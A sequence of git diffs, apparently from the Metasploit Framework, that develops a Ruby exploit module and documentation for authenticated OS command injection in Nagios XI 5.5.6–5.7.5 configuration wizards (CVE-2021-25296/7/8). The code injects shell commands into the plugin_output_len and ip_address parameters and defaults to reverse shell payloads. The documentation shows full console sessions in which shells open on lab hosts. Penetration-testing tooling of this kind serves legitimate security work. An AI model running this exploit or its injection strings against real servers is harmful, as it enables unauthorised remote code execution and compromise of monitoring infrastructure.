+[*] Started reverse SSL handler on 192.168.104.2:1234 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Attempting to authenticate to Nagios XI...
+[+] Successfully authenticated to Nagios XI
+[*] Target is Nagios XI with version 5.7.5
+[+] The target appears to be vulnerable.
+[*] Executing the payload
+[*] Command shell session 1 opened (192.168.104.2:1234 -> 192.168.104.7:50884 ) at 2023-01-18 09:52:59 -0500
+
+id
+uid=48(apache) gid=48(apache) groups=48(apache),1000(nagios),1001(nagcmd)
 ```
 
 ## Version and OS

--- a/documentation/modules/exploit/linux/http/nagios_xi_configwizards_authenticated_rce.md
+++ b/documentation/modules/exploit/linux/http/nagios_xi_configwizards_authenticated_rce.md
@@ -1,14 +1,20 @@
 ## Vulnerable Application
-This module exploits CVE-2021-25926, CVE-2021-25927, or CVE-2021-25928, OS command injection vulnerabilities in `/nagiosxi/config/monitoringwizard.php` that enables an authenticated user to achieve remote code execution on NagiosXI 5.7.5. There are two vulnerable parameters (ip_address, plugin_output_len), and either can be used to achieve code execution.
+This module exploits CVE-2021-25926, CVE-2021-25927, or CVE-2021-25928, OS command injection vulnerabilities
+in `/nagiosxi/config/monitoringwizard.php` that enable an authenticated user to achieve remote code execution
+on NagiosXI 5.7.5. There are three vulnerable configuration wizards (windowswmi, switch, digitalocean) that 
+use two vulnerable URL parameters (ip_address, plugin_output_len). The windowswmi uses the plugin_output_len,
+while switch and digitalocean use ip_address.
 
-The module's `check` method takes advantage of the `Msf::Exploit::Remote::HTTP::NagiosXi` mixin in order to authenticate to the target and
-obtain the Nagios XI version number, which is then used to check if the target is version 5.7.5 and therefore vulnerable.
+The module's `check` method takes advantage of the `Msf::Exploit::Remote::HTTP::NagiosXi` mixin in order to authenticate
+to the target and obtain the Nagios XI version number, which is then used to check if the target is version 5.7.5 and therefore vulnerable.
 
-An OVA with the vulnerable NagiosXI application can be downloaded from Nagios [here](https://assets.nagios.com/downloads/nagiosxi/5/ovf/nagiosxi-5.7.5-64.ova).
-
+An OVA with the vulnerable NagiosXI application can be downloaded from
+Nagios [here](https://assets.nagios.com/downloads/nagiosxi/5/ovf/nagiosxi-5.7.5-64.ova).
+The OVA has NagiosXI running on startup, but must be fully installed and have the license agreement accepted.
+The module can attempt to do this for you, but can also be done manually by visiting the target's IP and configuring
+it manually.
 
 ## Verification Steps
-
 
 - [ ] Start `msfconsole`
 - [ ] `use exploit/linux/http/nagios_xi_configwizards_authenticated_rce`
@@ -22,7 +28,6 @@ An OVA with the vulnerable NagiosXI application can be downloaded from Nagios [h
 - [ ] `set LPORT YOUR_LISTENING_PORT`
 - [ ] `run`
 
-
 ## Options
 
 ### USERNAME
@@ -31,11 +36,15 @@ A valid NagiosXI username, which can be for an administrator or regular user.
 ### PASSWORD
 The password for the provided NagiosXI username.
 
-### TARGET_URL_PARAM
-The vulnerable URL parameter to inject payloads into. Defaults to plugin_output_len with ip_address as another option.
+### TARGET_CONFIG_WIZARD
+The vulnerable configuration wizard to target. Each target corresponds to a specific CVE:
+- windowswmi : CVE-2021-25296
+- switch : CVE-2021-25297
+- digitalocean : CVE-2021-25298
 
 ## Scenarios
-Target is CentOS running NagiosXI 5.7.5 (Official OVA)
+
+### CentOS7 running NagiosXI 5.7.5 (Official OVA)
 ```
 msf6 > use exploit/linux/http/nagios_xi_configwizards_authenticated_rce
 [*] Using configured payload cmd/unix/reverse_perl_ssl
@@ -66,10 +75,3 @@ msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > run
 id
 uid=48(apache) gid=48(apache) groups=48(apache),1000(nagios),1001(nagcmd)
 ```
-
-## Version and OS
-Tested Nagios XI 5.7.5 on CentOS using their provided OVA
-
-## References
-- https://github.com/fs0c-sh/nagios-xi-5.7.5-bugs/blob/main/README.md
-- https://nvd.nist.gov/vuln/detail/CVE-2021-25296

--- a/documentation/modules/exploit/linux/http/nagios_xi_configwizards_authenticated_rce.md
+++ b/documentation/modules/exploit/linux/http/nagios_xi_configwizards_authenticated_rce.md
@@ -369,3 +369,83 @@ meterpreter > pwd
 /usr/local/nagiosxi/html/config
 meterpreter >
 ```
+
+### CentOS7 Running NagiosXI 5.5.6 (Official OVA) - CVE-2021-25297
+```
+msf6 > use exploit/linux/http/nagios_xi_configwizards_authenticated_rce
+[*] Using configured payload cmd/unix/reverse_perl_ssl
+msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set RHOSTS 192.168.104.18
+RHOSTS => 192.168.104.18
+msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set RPORT 443
+RPORT => 443
+msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set SSL true
+[!] Changing the SSL option's value may require changing RPORT!
+SSL => true
+msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set PASSWORD nagiosadmin
+PASSWORD => nagiosadmin
+msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set TARGET_CVE CVE-2021-25297
+TARGET_CVE => CVE-2021-25297
+msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set LHOST 192.168.104.2
+LHOST => 192.168.104.2
+msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set LPORT 8443
+LPORT => 8443
+msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > show options
+
+Module options (exploit/linux/http/nagios_xi_configwizards_authenticated_rce):
+
+   Name            Current Setting  Required  Description
+   ----            ---------------  --------  -----------
+   FINISH_INSTALL  false            no        If the Nagios XI installation has not been completed, try to do so. This includes signin
+                                              g the license agreement.
+   PASSWORD        nagiosadmin      no        Password to authenticate with
+   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS          192.168.104.18   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasp
+                                              loit
+   RPORT           443              yes       The target port (TCP)
+   SRVHOST         0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local m
+                                              achine or 0.0.0.0 to listen on all addresses.
+   SRVPORT         8080             yes       The local port to listen on.
+   SSL             true             no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI       /nagiosxi/       yes       The base path to the Nagios XI application
+   TARGET_CVE      CVE-2021-25297   yes       CVE to exploit (CVE-2021-25296, CVE-2021-25297, or CVE-2021-25298)
+   URIPATH                          no        The URI to use for this exploit (default is random)
+   USERNAME        nagiosadmin      no        Username to authenticate with
+   VHOST                            no        HTTP server virtual host
+
+
+Payload options (cmd/unix/reverse_perl_ssl):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.104.2    yes       The listen address (an interface may be specified)
+   LPORT  8443             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   2   CMD
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > exploit
+
+[*] Started reverse SSL handler on 192.168.104.2:8443 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Attempting to authenticate to Nagios XI...
+[+] Successfully authenticated to Nagios XI.
+[*] Target is Nagios XI with version 5.5.6.
+[+] The target appears to be vulnerable.
+[*] Sending the payload...
+[*] Command shell session 1 opened (192.168.104.2:8443 -> 192.168.104.18:58930) at 2023-02-07 14:27:41 -0500
+id
+uid=48(apache) gid=48(apache) groups=48(apache),1000(nagios),1001(nagcmd)
+whoami
+apache
+uname -a
+Linux localhost.localdomain 3.10.0-862.14.4.el7.x86_64 #1 SMP Wed Sep 26 15:12:11 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
+```

--- a/modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
+++ b/modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
@@ -126,16 +126,14 @@ class MetasploitModule < Msf::Exploit::Remote
       when 1..4 # An error occurred, propagate the error message
         return login_result, res_array[0]
       when 5 # The license agreement still needs to be signed
-        code, message = handle_unsigned_license(res_array, username, password, finish_install)
-        return code, message unless (code == 0)
+        login_result, res_array = handle_unsigned_license(res_array, username, password, finish_install)
+        return login_result, res_array unless (login_result == 0)
 
-        login_result == code
       end
     when 5 # The license agreement still needs to be signed
-      code, message = handle_unsigned_license(res_array, username, password, finish_install)
-      return code, message unless (code == 0)
+      login_result, res_array = handle_unsigned_license(res_array, username, password, finish_install)
+      return login_result, res_array unless (login_result == 0)
 
-      login_result == code
     end
 
     print_good('Successfully authenticated to Nagios XI.')

--- a/modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
+++ b/modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
@@ -151,7 +151,7 @@ class MetasploitModule < Msf::Exploit::Remote
       end
       nsp = res_array[0].match(/nsp_str = "([a-z0-9]+)/)
       if nsp
-        @nsp = nsp[0]
+        @nsp = nsp[1]
       else
         return login_result, 'Failed to extract nsp string'
       end

--- a/modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
+++ b/modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
@@ -19,7 +19,8 @@ class MetasploitModule < Msf::Exploit::Remote
         'Description' => %q{
           This module exploits CVE-2021-25296, CVE-2021-25297, or CVE-2021-25298,
           OS command injection vulnerabilities in several URL parameters that enables
-          an authenticated user to perform remote code execution on Nagios XI 5.7.5.
+          an authenticated user to perform remote code execution on Nagios XI 5.7.5 as
+          the apache user.
 
           Valid credentials for a Nagios XI user are required. This module has
           been successfully tested against the official NagiosXI 5.7.5 OVA.
@@ -47,12 +48,13 @@ class MetasploitModule < Msf::Exploit::Remote
             'CMD', {
               'Arch' => [ ARCH_CMD ],
               'Platform' => 'unix',
-              'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' }
+              # the only reliable payloads against a typical Nagios XI host (CentOS 7 minimal) seem to be cmd/unix/reverse_perl_ssl and cmd/unix/reverse_openssl
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl_ssl' }
             }
           ]
         ],
         'Privileged' => false,
-        'DefaultTarget' => 0,
+        'DefaultTarget' => 1,
         'DisclosureDate' => '2021-02-13',
         'Notes' => {
           'Stability' => [ CRASH_SAFE ],
@@ -65,7 +67,7 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options [
       OptString.new('USERNAME', [true, 'Username to authenticate with', 'nagiosadmin']),
       OptString.new('PASSWORD', [true, 'Password to authenticate with', nil]),
-      OptString.new('TARGET_URL_PARAM', [true, 'Targeted URL Parameter (plugin_output_len or ip_address)', 'plugin_output_len'])
+      OptString.new('TARGET_URL_PARAM', [true, 'Targeted URL Parameter (plugin_output_len or ip_address)', 'ip_address'])
     ]
   end
 
@@ -125,6 +127,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Obtain the Nagios XI version
     @auth_cookies = res_array[1] # if we are here, this cannot be nil since the mixin checks for that already
+    @nsp = res_array[0].scan(/nsp_str = "([a-z0-9]+)/)[0][0]
 
     nagios_version = nagios_xi_version(res_array[0])
     if nagios_version.nil?
@@ -148,15 +151,35 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def execute_command(cmd, _opts = {})
     # execute payload based on the selected URL Parameter
+    url_params = {
+      'update' => 1,
+      'nsp' => @nsp
+    }
+    if datastore['TARGET_URL_PARAM'] == 'ip_address'
+      url_params = url_params.merge({
+        datastore['TARGET_URL_PARAM'] => "127.0.0.1; #{cmd};",
+        'nextstep' => 4,
+        'wizard' => 'digitalocean'
+      })
+    elsif datastore['TARGET_URL_PARAM'] == 'plugin_output_len'
+      url_params = url_params.merge({
+        'nextstep' => 3,
+        'wizard' => 'windowswmi',
+        'check_wmic_plus_ver' => '1.65',
+        'ip_address' => '127.0.0.1',
+        'domain' => '127.0.0.1',
+        'username' => 'nagiosadmin',
+        'password' => 'password',
+        datastore['TARGET_URL_PARAM'] => "9999; #{cmd};"
+      })
+    end
+
     send_request_cgi({
       'method' => 'GET',
-      'uri' => normalize_uri('/nagiosxi/config/monitoringwizard.php'),
+      'uri' => '/nagiosxi/config/monitoringwizard.php',
       'cookie' => @auth_cookies,
-      'vars_get' =>
-{
-  datastore['TARGET_URL_PARAM'] => "; #{cmd};"
-}
-    }, 0) # don't wait for a response from the target, otherwise the module will in most cases hang for a few seconds after executing the payload
+      'vars_get' => url_params
+    }, 0)
   end
 
   def exploit

--- a/modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
+++ b/modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
@@ -165,13 +165,10 @@ class MetasploitModule < Msf::Exploit::Remote
       url_params = url_params.merge({
         'nextstep' => 3,
         'wizard' => 'windowswmi',
-        'check_wmic_plus_ver' => '1.65',
-        'ip_address' => '127.0.0.1',
-        'domain' => '127.0.0.1',
-        'username' => 'nagiosadmin',
-        'password' => 'password',
         datastore['TARGET_URL_PARAM'] => "9999; #{cmd};"
       })
+    else
+      fail_with(Failure::BadConfig, 'Invalid TARGET_URL_PARAM: Choose ip_address or plugin_output_len')
     end
 
     send_request_cgi({

--- a/modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
+++ b/modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
@@ -18,9 +18,9 @@ class MetasploitModule < Msf::Exploit::Remote
         'Name' => 'Nagios XI 5.7.5 - ConfigWizards Authenticated Remote Code Exection',
         'Description' => %q{
           This module exploits CVE-2021-25296, CVE-2021-25297, or CVE-2021-25298,
-          OS command injection vulnerabilities in several URL parameters that enables
-          an authenticated user to perform remote code execution on Nagios XI 5.7.5 as
-          the apache user.
+          OS command injection vulnerabilities in the `ip_address` or `plugin_output_len`
+          URL paramaeters which allow an authenticated user to perform remote code
+          execution on Nagios XI 5.7.5 as the apache user.
 
           Valid credentials for a Nagios XI user are required. This module has
           been successfully tested against the official NagiosXI 5.7.5 OVA.
@@ -32,7 +32,8 @@ class MetasploitModule < Msf::Exploit::Remote
         'References' => [
           ['CVE', '2021-25296'],
           ['CVE', '2021-25297'],
-          ['CVE', '2021-25298']
+          ['CVE', '2021-25298'],
+          ['URL', 'https://github.com/fs0c-sh/nagios-xi-5.7.5-bugs/blob/main/README.md']
         ],
         'Platform' => %w[linux unix],
         'Arch' => [ ARCH_X86, ARCH_X64, ARCH_CMD ],
@@ -41,7 +42,7 @@ class MetasploitModule < Msf::Exploit::Remote
             'Linux (x86/x64)', {
               'Arch' => [ ARCH_X86, ARCH_X64 ],
               'Platform' => 'linux',
-              'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' }
+              'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }
             }
           ],
           [
@@ -65,9 +66,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     register_options [
-      OptString.new('USERNAME', [true, 'Username to authenticate with', 'nagiosadmin']),
-      OptString.new('PASSWORD', [true, 'Password to authenticate with', nil]),
-      OptString.new('TARGET_URL_PARAM', [true, 'Targeted URL Parameter (plugin_output_len or ip_address)', 'ip_address'])
+      OptString.new('TARGET_CONFIG_WIZARD', [true, 'Targeted Configuration Wizard (windowswmi, digitalocean, or switch)', 'windowswmi'])
     ]
   end
 
@@ -83,64 +82,67 @@ class MetasploitModule < Msf::Exploit::Remote
     datastore['FINISH_INSTALL']
   end
 
-  def check
+  def authenticate
     # Use nagios_xi_login to try and authenticate. If authentication succeeds, nagios_xi_login returns
     # an array containing the http response body of a get request to index.php and the session cookies
     login_result, res_array = nagios_xi_login(username, password, finish_install)
     case login_result
     when 1..3 # An error occurred
-      return CheckCode::Unknown(res_array[0])
+      fail_with(Failure::Unknown, 'Failed to authenticate to NagiosXI')
     when 4 # Nagios XI is not fully installed
       install_result = install_nagios_xi(password)
       if install_result
-        return CheckCode::Unknown(install_result[1])
+        fail_with(Failure::Unknown, 'Failed to authenticate to NagiosXI')
       end
 
       login_result, res_array = login_after_install_or_license(username, password, finish_install)
       case login_result
       when 1..3 # An error occurred
-        return CheckCode::Unknown(res_array[0])
+        fail_with(Failure::Unknown, 'Failed to authenticate to NagiosXI')
       when 4 # Nagios XI is still not fully installed
-        return CheckCode::Detected('Failed to install Nagios XI on the target.')
+        fail_with(Failure::Unknown, 'Failed to install Nagios XI on the target.')
+      when 5
+        auth_cookies, nsp = res_array
+        sign_license_result = sign_license_agreement(auth_cookies, nsp)
+        if sign_license_result
+          fail_with(Failure::Unknown, 'Failed to authenticate to NagiosXI')
+        end
+
+        login_result, res_array = login_after_install_or_license(username, password, finish_install)
+        case login_result
+        when 1..3
+          fail_with(Failure::Unknown, 'Failed to authenticate to NagiosXI')
+        when 4 # Nagios XI is still not fully installed
+          fail_with(Failure::Unknown, 'Failed to install Nagios XI on the target.')
+        when 5 # the Nagios XI license agreement still has not been signed
+          fail_with(Failure::Unknown, 'Failed to sign the license agreement.')
+        end
       end
     end
+    print_good('Successfully authenticated to Nagios XI.')
 
-    # when 5 is excluded from the case statement above to prevent having to use this code block twice.
-    # Including when 5 would require using this code block once at the end of the `when 4` code block above, and once here.
-    if login_result == 5 # the Nagios XI license agreement has not been signed
-      auth_cookies, nsp = res_array
-      sign_license_result = sign_license_agreement(auth_cookies, nsp)
-      if sign_license_result
-        return CheckCode::Unknown(sign_license_result[1])
-      end
-
-      login_result, res_array = login_after_install_or_license(username, password, finish_install)
-      case login_result
-      when 1..3
-        return CheckCode::Unknown(res_array[0])
-      when 5 # the Nagios XI license agreement still has not been signed
-        return CheckCode::Detected('Failed to sign the license agreement.')
-      end
-    end
-
-    print_good('Successfully authenticated to Nagios XI')
-
-    # Obtain the Nagios XI version
     @auth_cookies = res_array[1] # if we are here, this cannot be nil since the mixin checks for that already
     @nsp = res_array[0].scan(/nsp_str = "([a-z0-9]+)/)[0][0]
 
-    nagios_version = nagios_xi_version(res_array[0])
+    return res_array
+  end
+
+  def check
+    # Authenticate to ensure we can access the NagiosXI version
+    version_response = authenticate
+
+    nagios_version = nagios_xi_version(version_response[0])
     if nagios_version.nil?
       return CheckCode::Detected('Unable to obtain the Nagios XI version from the dashboard')
     end
 
-    print_status("Target is Nagios XI with version #{nagios_version}")
+    print_status("Target is Nagios XI with version #{nagios_version}.")
 
     if /^\d{4}R\d\.\d/.match(nagios_version) || /^\d{4}RC\d/.match(nagios_version) || /^\d{4}R\d.\d[A-Ha-h]/.match(nagios_version) || nagios_version == '5R1.0'
-      nagios_version = '1.0.0' # Set to really old version as a placeholder. Basically we don't want to exploit these versions.
+      nagios_version = '1.0.0' # Set to really old version as a placeholder.
     end
 
-    # check if the target is actually vulnerable
+    # Check if the target is the vulnerable version
     version = Rex::Version.new(nagios_version)
     if version == Rex::Version.new('5.7.5')
       return CheckCode::Appears
@@ -150,30 +152,41 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def execute_command(cmd, _opts = {})
-    # execute payload based on the selected URL Parameter
+    if !@nsp || !@auth_cookies # Check to see if we already authenticated during the check
+      authenticate
+    end
+
+    # execute payload based on the selected targeted configuration wizard
     url_params = {
       'update' => 1,
       'nsp' => @nsp
     }
-    if datastore['TARGET_URL_PARAM'] == 'ip_address'
-      url_params = url_params.merge({
-        datastore['TARGET_URL_PARAM'] => "127.0.0.1; #{cmd};",
-        'nextstep' => 4,
-        'wizard' => 'digitalocean'
-      })
-    elsif datastore['TARGET_URL_PARAM'] == 'plugin_output_len'
+    if datastore['TARGET_CONFIG_WIZARD'] == 'windowswmi'
       url_params = url_params.merge({
         'nextstep' => 3,
         'wizard' => 'windowswmi',
-        'check_wmic_plus_ver' => '1.65',
         'ip_address' => Rex::Text.rand_text_alpha(7..15),
         'domain' => Rex::Text.rand_text_alpha(7..15),
         'username' => Rex::Text.rand_text_alpha(7..20),
         'password' => Rex::Text.rand_text_alpha(7..20),
-        datastore['TARGET_URL_PARAM'] => Rex::Text.rand_text_numeric(5) + "; #{cmd};"
+        'plugin_output_len' => Rex::Text.rand_text_numeric(5) + "; #{cmd};"
+      })
+    elsif datastore['TARGET_CONFIG_WIZARD'] == 'switch'
+      url_params = url_params.merge({
+        'nextstep' => 3,
+        'wizard' => 'switch',
+        'ip_address' => "\"; #{cmd};",
+        'snmpopts[snmpcommunity]' => Rex::Text.rand_text_alpha(7..15),
+        'scaninterfaces' => 'on'
+      })
+    elsif datastore['TARGET_CONFIG_WIZARD'] == 'digitalocean'
+      url_params = url_params.merge({
+        'ip_address' => "; #{cmd};",
+        'nextstep' => 4,
+        'wizard' => 'digitalocean'
       })
     else
-      fail_with(Failure::BadConfig, 'Invalid TARGET_URL_PARAM: Choose ip_address or plugin_output_len')
+      fail_with(Failure::BadConfig, 'Invalid TARGET_CONFIG_WIZARD: Choose windowswmi, switch, or digitalocean.')
     end
 
     send_request_cgi({

--- a/modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
+++ b/modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
@@ -127,7 +127,12 @@ class MetasploitModule < Msf::Exploit::Remote
     print_good('Successfully authenticated to Nagios XI.')
     # Extract the authenticated cookies and nsp to use throughout the module
     if res_array.length == 2
-      @auth_cookies = res_array[1]
+      auth_cookies = res_array[1]
+      if auth_cookies && /nagiosxi=[a-z0-9]+;/.match(auth_cookies)
+        @auth_cookies = auth_cookies
+      else
+        return login_result, 'Failed to extract authentication cookies'
+      end
       nsp = res_array[0].scan(/nsp_str = "([a-z0-9]+)/)
       if nsp
         @nsp = nsp[0][0]

--- a/modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
+++ b/modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
@@ -15,15 +15,15 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       update_info(
         info,
-        'Name' => 'Nagios XI 5.7.5 - ConfigWizards Authenticated Remote Code Exection',
+        'Name' => 'Nagios XI 5.5.6 to 5.7.5 - ConfigWizards Authenticated Remote Code Exection',
         'Description' => %q{
-          This module exploits CVE-2021-25296, CVE-2021-25297, or CVE-2021-25298,
-          OS command injection vulnerabilities in the `ip_address` or `plugin_output_len`
-          URL paramaeters which allow an authenticated user to perform remote code
-          execution on Nagios XI 5.7.5 as the apache user.
+          This module exploits CVE-2021-25296, CVE-2021-25297, and CVE-2021-25298, which are
+          OS command injection vulnerabilities in the windowswmi, switch, and cloud-vm
+          configuration wizards that allow an authenticated user to perform remote code
+          execution on Nagios XI versions 5.5.6 to 5.7.5 as the apache user.
 
           Valid credentials for a Nagios XI user are required. This module has
-          been successfully tested against the official NagiosXI 5.7.5 OVA.
+          been successfully tested against official NagiosXI OVAs from 5.5.6-5.7.5.
         },
         'License' => MSF_LICENSE,
         'Author' => [
@@ -39,8 +39,15 @@ class MetasploitModule < Msf::Exploit::Remote
         'Arch' => [ ARCH_X86, ARCH_X64, ARCH_CMD ],
         'Targets' => [
           [
-            'Linux (x86/x64)', {
-              'Arch' => [ ARCH_X86, ARCH_X64 ],
+            'Linux (x86)', {
+              'Arch' => [ ARCH_X86 ],
+              'Platform' => 'linux',
+              'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' }
+            }
+          ],
+          [
+            'Linux (x64)', {
+              'Arch' => [ ARCH_X64 ],
               'Platform' => 'linux',
               'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }
             }
@@ -55,7 +62,7 @@ class MetasploitModule < Msf::Exploit::Remote
           ]
         ],
         'Privileged' => false,
-        'DefaultTarget' => 1,
+        'DefaultTarget' => 2,
         'DisclosureDate' => '2021-02-13',
         'Notes' => {
           'Stability' => [ CRASH_SAFE ],
@@ -66,7 +73,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     register_options [
-      OptString.new('TARGET_CONFIG_WIZARD', [true, 'Targeted Configuration Wizard (windowswmi, digitalocean, or switch)', 'windowswmi'])
+      OptString.new('TARGET_CVE', [true, 'CVE to exploit (CVE-2021-25296, CVE-2021-25297, or CVE-2021-25298)', 'CVE-2021-25296'])
     ]
   end
 
@@ -83,68 +90,83 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def authenticate
-    # Use nagios_xi_login to try and authenticate. If authentication succeeds, nagios_xi_login returns
-    # an array containing the http response body of a get request to index.php and the session cookies
+    # Use nagios_xi_login to try and authenticate.
     login_result, res_array = nagios_xi_login(username, password, finish_install)
     case login_result
-    when 1..3 # An error occurred
-      fail_with(Failure::Unknown, 'Failed to authenticate to NagiosXI')
+    when 1..3 # An error occurred, propagate the error message
+      return login_result, res_array[0]
     when 4 # Nagios XI is not fully installed
       install_result = install_nagios_xi(password)
-      if install_result
-        fail_with(Failure::Unknown, 'Failed to authenticate to NagiosXI')
+      if install_result # On installation failure, result is an array with the code and error message
+        return install_result[0], install_result[1]
       end
 
       login_result, res_array = login_after_install_or_license(username, password, finish_install)
       case login_result
-      when 1..3 # An error occurred
-        fail_with(Failure::Unknown, 'Failed to authenticate to NagiosXI')
-      when 4 # Nagios XI is still not fully installed
-        fail_with(Failure::Unknown, 'Failed to install Nagios XI on the target.')
-      when 5
+      when 1..4 # An error occurred, propagate the error message
+        return login_result, res_array[0]
+      when 5 # The license agreement still needs to be signed
         auth_cookies, nsp = res_array
         sign_license_result = sign_license_agreement(auth_cookies, nsp)
         if sign_license_result
-          fail_with(Failure::Unknown, 'Failed to authenticate to NagiosXI')
+          return 5, 'Failed to sign license agreement'
         end
 
+        print_status('License agreement signed. The module will wait for 5 seconds and retry the login.')
+        sleep 5
         login_result, res_array = login_after_install_or_license(username, password, finish_install)
         case login_result
-        when 1..3
-          fail_with(Failure::Unknown, 'Failed to authenticate to NagiosXI')
-        when 4 # Nagios XI is still not fully installed
-          fail_with(Failure::Unknown, 'Failed to install Nagios XI on the target.')
-        when 5 # the Nagios XI license agreement still has not been signed
-          fail_with(Failure::Unknown, 'Failed to sign the license agreement.')
+        when 1..4 # An error occurred, propagate the error message
+          return login_result, res_array[0]
+        when 5 # The Nagios XI license agreement still has not been signed
+          return 5, 'Failed to sign the license agreement.'
         end
       end
     end
+
     print_good('Successfully authenticated to Nagios XI.')
+    # Extract the authenticated cookies and nsp to use throughout the module
+    if res_array.length == 2
+      @auth_cookies = res_array[1]
+      nsp = res_array[0].scan(/nsp_str = "([a-z0-9]+)/)
+      if nsp
+        @nsp = nsp[0][0]
+      end
+    else
+      return login_result, 'Failed to extract auth cookies and nsp string'
+    end
 
-    @auth_cookies = res_array[1] # if we are here, this cannot be nil since the mixin checks for that already
-    @nsp = res_array[0].scan(/nsp_str = "([a-z0-9]+)/)[0][0]
-
-    return res_array
-  end
-
-  def check
-    # Authenticate to ensure we can access the NagiosXI version
-    version_response = authenticate
-
-    nagios_version = nagios_xi_version(version_response[0])
+    # Set the version here so both check and exploit can use it
+    nagios_version = nagios_xi_version(res_array[0])
     if nagios_version.nil?
-      return CheckCode::Detected('Unable to obtain the Nagios XI version from the dashboard')
+      return 6, 'Unable to obtain the Nagios XI version from the dashboard'
     end
 
     print_status("Target is Nagios XI with version #{nagios_version}.")
 
+    # Versions of NagiosXI pre-5.2 have different formats (5r1.0, 2014r2.7, 2012r2.8b, etc.) that Rex cannot handle,
+    # so we set pre-5.2 versions to 1.0.0 for easier Rex comparison because the module only works on post-5.2 versions.
     if /^\d{4}R\d\.\d/.match(nagios_version) || /^\d{4}RC\d/.match(nagios_version) || /^\d{4}R\d.\d[A-Ha-h]/.match(nagios_version) || nagios_version == '5R1.0'
-      nagios_version = '1.0.0' # Set to really old version as a placeholder.
+      nagios_version = '1.0.0'
+    end
+    @version = Rex::Version.new(nagios_version)
+
+    return 0, 'Successfully authenticated and retrieved NagiosXI Version.'
+  end
+
+  def check
+    # Authenticate to ensure we can access the NagiosXI version
+    auth_result, err_msg = authenticate
+    case auth_result
+    when 1
+      return CheckCode::Unknown(err_msg)
+    when 2, 4, 5, 6
+      return CheckCode::Detected(err_msg)
+    when 3
+      return CheckCode::Safe(err_msg)
     end
 
-    # Check if the target is the vulnerable version
-    version = Rex::Version.new(nagios_version)
-    if version == Rex::Version.new('5.7.5')
+    if @version >= Rex::Version.new('5.5.6') && @version <= Rex::Version.new('5.7.5')
       return CheckCode::Appears
     end
 
@@ -153,7 +175,15 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def execute_command(cmd, _opts = {})
     if !@nsp || !@auth_cookies # Check to see if we already authenticated during the check
-      authenticate
+      auth_result, err_msg = authenticate
+      case auth_result
+      when 1
+        fail_with(Failure::Disconnected, err_msg)
+      when 2, 4, 5, 6
+        fail_with(Failure::UnexpectedReply, err_msg)
+      when 3
+        fail_with(Failure::NotVulnerable, err_msg)
+      end
     end
 
     # execute payload based on the selected targeted configuration wizard
@@ -161,7 +191,16 @@ class MetasploitModule < Msf::Exploit::Remote
       'update' => 1,
       'nsp' => @nsp
     }
-    if datastore['TARGET_CONFIG_WIZARD'] == 'windowswmi'
+    # After version 5.5.7, the URL parameter used in CVE-2021-25297 and CVE-2021-25298
+    # changes from address to ip_address
+    if @version >= Rex::Version.new('5.5.6') && @version <= Rex::Version.new('5.5.7')
+      address_param = 'address'
+    else
+      address_param = 'ip_address'
+    end
+
+    # CVE-2021-25296 affects the windowswmi configuration wizard.
+    if datastore['TARGET_CVE'] == 'CVE-2021-25296'
       url_params = url_params.merge({
         'nextstep' => 3,
         'wizard' => 'windowswmi',
@@ -171,24 +210,30 @@ class MetasploitModule < Msf::Exploit::Remote
         'password' => Rex::Text.rand_text_alpha(7..20),
         'plugin_output_len' => Rex::Text.rand_text_numeric(5) + "; #{cmd};"
       })
-    elsif datastore['TARGET_CONFIG_WIZARD'] == 'switch'
+    # CVE-2021-25297 affects the switch configuration wizard.
